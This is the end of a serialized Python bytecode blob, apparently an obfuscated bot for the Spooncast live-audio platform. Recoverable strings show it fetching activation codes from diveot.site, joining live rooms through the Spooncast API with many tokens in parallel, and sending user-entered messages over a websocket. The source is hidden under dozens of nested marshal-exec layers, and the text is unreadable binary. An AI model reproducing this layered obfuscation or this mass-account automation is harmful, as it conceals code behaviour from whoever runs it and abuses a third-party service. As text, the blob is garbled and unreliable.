)\x02\xfa\nUser-AgentZ\rAuthorization\xfa#https://id-api.spooncast.net/lives/\xfa\x01/\xda\x04join)\x02\xda\x06params\xda\x07headersZ\x0bstatus_code\xe9\xc8\x00\x00\x00Fz!wss://id-heimdallr.spooncast.net/)\x03r2\x00\x00\x00r5\x00\x00\x00r7\x00\x00\x00Z\x07loading)\x0fr9\x00\x00\x00\xda\x08requestsZ\x04postr8\x00\x00\x00rE\x00\x00\x00r(\x00\x00\x00\xda\twebsocketZ\x0benableTraceZ\x0cWebSocketAppr2\x00\x00\x00r5\x00\x00\x00r7\x00\x00\x00r?\x00\x00\x00Z\x0brun_foreverr\x11\x00\x00\x00)\x05Z\x06tokettrF\x00\x00\x00Z\x04ressZ\x04sttsr1\x00\x00\x00r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\nmultiucing\x02\x02\x00\x00s\x14\x00\x00\x00\x00\x02\x04\x01\x0e\x01 \x01\x0c\x01\x08\x01\n\x01\x16\x01\x06\x01\n\x02rJ\x00\x00\x00\xda\x08__main__z\x13sedang mengecek ...z\x11sedang memuat ...z\x1apastikan internet aman ...z$https://diveot.site/spoon/kode8.jsonr\n\x00\x00\x00z#https://diveot.site/spoon/pesan.txt\xda\x04kodez\r../wibu/js.gmz\x02w+i\xa0\x86\x01\x00i?B\x0f\x00\xda\x01rz\x10KODE AKTIVASI = z\x14../sepun/johnson.divz\x17KODE AKTIVASI SEPUN7 = \xe92\x00\x00\x00z\x15status:sudah aktivasiz\x15status:belum aktivasi\xe9\x05\x00\x00\x00Z\x08passwordz\x0eSELAMAT DATANGg\x00\x00\x00\x00\x00\x00\xe0?Z\x05enjoyZ\x02cvZ\nheimdallr2z\x15masukkan link spoon: z\x14masukkan isi pesan: r@\x00\x00\x00zvtext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3)\x02rA\x00\x00\x00Z\x06accept\xe9"\x00\x00\x00i\xc5\xff\xff\xffrB\x00\x00\x00)\x01Z\x0bmax_workers)arI\x00\x00\x00r\x02\x00\x00\x00r(\x00\x00\x00r\x1e\x00\x00\x00r\x03\x00\x00\x00r=\x00\x00\x00\xda\x0bImportError\xda\x07_threadrH\x00\x00\x00Z\x06randomZ\x12concurrent.futuresr\x04\x00\x00\x00r\x05\x00\x00\x00r\x0f\x00\x00\x00r\x1a\x00\x00\x00\xda\x05tokenr-\x00\x00\x00Z\x06uproomZ\x06botoutZ\x02xzZ\x06statusZ\x04namaZ\x05judulZ\x05todayZ\x05timehZ\tresponse3Z\x08createdlZ\x05rankeZ\x05totidZ\x06countrZ\x05nurutZ\x05vocerZ\x06vocer2Z\x05json2Z\tinccountrZ\x08listlaguZ\nlagucountrZ\x05ngeupZ\x05cidddZ\x04tirur9\x00\x00\x00r+\x00\x00\x00r*\x00\x00\x00Z\x05namalZ\x06judullZ\x07timehl2r\x13\x00\x00\x00r\x15\x00\x00\x00r\x18\x00\x00\x00r"\x00\x00\x00r2\x00\x00\x00r5\x00\x00\x00r7\x00\x00\x00r?\x00\x00\x00rJ\x00\x00\x00\xda\x08__name__rL\x00\x00\x00r\x11\x00\x00\x00\xda\x03getZ\x02zzr\x10\x00\x00\x00\xda\x04textr\x14\x00\x00\x00Z\x08aktivasi\xda\x04path\xda\x06exists\xda\x04open\xda\x04fileZ\x07randint\xda\x03abcr\x1c\x00\x00\x00r,\x00\x00\x00r.\x00\x00\x00\xda\x01f\xda\x03int\xda\x04readZ\x03kod\xda\x01g\xda\x04exitZ\x02pwr\x1f\x00\x00\x00rE\x00\x00\x00\xda\x05inputZ\x05txtidr/\x00\x00\x00rF\x00\x00\x00Z\x08responseZ\x03urlr8\x00\x00\x00Z\tresponse2r:\x00\x00\x00Z\x07shuffleZ\tprocessesZ\x08executorZ\x05toketr\x17\x00\x00\x00Z\x06submitr\x12\x00\x00\x00r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00s\x84\x03\x00\x00\x08\x01\x0c\x01\x08\x01\x08\x01\x08\x01\x0c\x01\x02\x01\x0c\x01\x0e\x01\x0e\x01\x08\x01\x08\x01\x08\x01\x10\x01\x08\x01\x08\x05\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x80\x00\xba\x04\x7f\x00J\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x80\x00\xfe\x04\x7f\x00\x08\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x08\x01\x06\x01\x08\x01\x04\x01\x04\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x14\x01\x04\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x08\x03\x0c\x0c\x0c\x0c\x0c\x07\x0c\x06\x0cF\x0c\x03\x0c\x03\x0c\x0f\x0c\x0f\x0c\x05\x04\x01\n\x01\n\x01\n\x01\x0c\x01\x0c\x01\n\x01\x0e\x03\x0e\t\x16\x01\x06\x01\x0e\x01\x10\x01\x0e\x01\x08\x01\x0e\x01\x0c\x01\x12\x01\x16\x01\x0e\x01\x0c\x01\x12\x01\x08\x01\x08\x01\x08\x04\x0e\x01\x0c\x01\n\x04\n\x01\x0c\x01\x0c\x03\x06\x01\n\x01\x12\x01\x16\x01\x0e\x01\x0c\x01\x1e\x01\x08\x01\x06\x04\x08\x04\x0e\x06\n\x01\x0c\x01\x0c\x01\n\x01\x08\x03\x08\x05\x0c\x03\n\x01\n\x01\x10\x01\n\x01\x06\x01\x10\x01\x10\x01\x04\x01\x06\x02\n\x01\x04\x01\x10\x01\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\